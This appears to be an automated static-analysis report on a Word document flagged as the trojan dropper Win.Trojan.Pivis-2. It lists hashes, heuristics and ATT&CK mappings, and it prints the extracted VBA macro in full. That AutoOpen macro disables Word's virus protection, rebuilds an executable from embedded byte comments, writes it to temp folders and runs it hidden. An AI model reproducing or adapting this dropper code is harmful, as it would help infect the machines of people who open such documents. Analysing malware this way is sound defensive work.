Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 37f9c61c318c488a…

MALICIOUS

Office (OLE)

217.5 KB Created: 2000-09-06 09:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 10f0f28b488941c6bfb9b833c1b9f312 SHA-1: cf5a5dcf113d7fd25e1bcfe2fb3f8e50c5be1d31 SHA-256: 37f9c61c318c488a63eb27bf32f4234c6e68fe572220f2209ef147c6e61bb621
240 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine that is designed to drop and execute a file named SYSTRAYW32.EXE. The macro reconstructs the file content from concatenated characters and writes it to disk, attempting execution from C:\TEMP\SYSTRAYW32.EXE, then C:\SYSTRAYW32.EXE, and finally C:\WINNT\TEMP\S. This behavior is consistent with a trojan dropper.

Heuristics 6

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19856 bytes
SHA-256: eb12ca4645ca6077e95d2282d62b049ff634d4616d94c02a834d4c6c46d3981e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Harmony"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On Error Resume Next

Dim Crottin_Begin As Integer
Dim Crottin_Buffer As String
Dim File As String
Dim CanardWC As Double


' on set quelques options utiles

Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.SendMailAttach = True
Options.SavePropertiesPrompt = False
Options.BackgroundSave = True

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
        
    ' on determine la 1ere ligne des caracteres ascii dans AD
    
     Crottin_Begin = 0
     Do
        Crottin_Begin = Crottin_Begin + 1
     Loop While (AD.CodeModule.Lines(Crottin_Begin, 1) <> "'meuh")
    
    Crottin_Begin = Crottin_Begin + 1
   
' on dump le fichier et on l'execute

Do
    If (AD.CodeModule.Lines(Crottin_Begin, 1) <> "") Then
        Crottin_Buffer = AD.CodeModule.Lines(Crottin_Begin, 1)
        Whatever = Right(Crottin_Buffer, Len(Crottin_Buffer) - 1)
        File = File + Chr(Whatever)
    End If
    Crottin_Begin = Crottin_Begin + 1
Loop While (AD.CodeModule.Lines(Crottin_Begin, 1) <> "'prout")

Kill "C:\TEMP\SYSTRAYW32.EXE"
Open "C:\TEMP\SYSTRAYW32.EXE" For Binary Access Write As #1
Put #1, 1, File
Close #1
CanardWC = Shell("C:\TEMP\SYSTRAYW32.EXE", vbHide)

If CanardWC = 0 Then
    
    Kill "C:\SYSTRAYW32.EXE"
    Open "C:\SYSTRAYW32.EXE" For Binary Access Write As #1
    Put #1, 1, File
    Close #1
    CanardWC = Shell("C:\SYSTRAYW32.EXE", vbHide)
        
End If

If CanardWC = 0 Then
    
    Kill "C:\WINNT\TEMP\SYSTRAYW32.EXE"
    Open "C:\WINNT\TEMP\SYSTRAYW32.EXE" For Binary Access Write As #1
    Put #1, 1, File
    Close #1
    CanardWC = Shell("C:\WINNT\TEMP\SYSTRAYW32.EXE", vbHide)
        
End If


BABAILLE:

ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ActiveDocument.Saved = True


End Sub

'meuh

'77
'90
'80
'0
'2
'0
'0
'0
'4
'0
'15
'0
'255
'255
'0
'0
'184
'0
'0
'0
'0
'0
'0
'0
'64
'0
'26
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'1
'0
'0
'186
'16
'0
'14
'31
'180
'9
'205
'33
'184
'1
'76
'205
'33
'144
'144
'84
'104
'105
'115
'32
'112
'114
'111
'103
'114
'97
'109
'32
'109
'117
'115
'116
'32
'98
'101
'32
'114
'117
'110
'32
'117
'110
'100
'101
'114
'32
'87
'105
'110
'51
'50
'13
'10
'36
'55
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'80
'69
'0
'0
'76
'1
'4
'0
'38
'41
'53
'79
'0
'0
'0
'0
'0
'0
'0
'0
'224
'0
'142
'129
'11
'1
'2
'25
'0
'2
'0
'0
'0
'8
'0
'0
'0
'0
'0
'0
'0
'16
'0
'0
'0
'16
'0
'0
'0
'32
'0
'0
'0
'0
'64
'0
'0
'16
'0
'0
'0
'2
'0
'0
'1
'0
'0
'0
'0
'0
'0
'0
'3
'0
'10
'0
'0
'0
'0
'0
'0
'80
'0
'0
'0
'4
'0
'0
'0
'0
'0
'0
'2
'0
'0
'0
'0
'0
'16
'0
'0
'32
'0
'0
'0
'0
'16
'0
'0
'16
'0
'0
'0
'0
'0
'0
'16
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'48
'0
'0
'174
'1
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'64
'0
'0
'80
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
'0
... (truncated)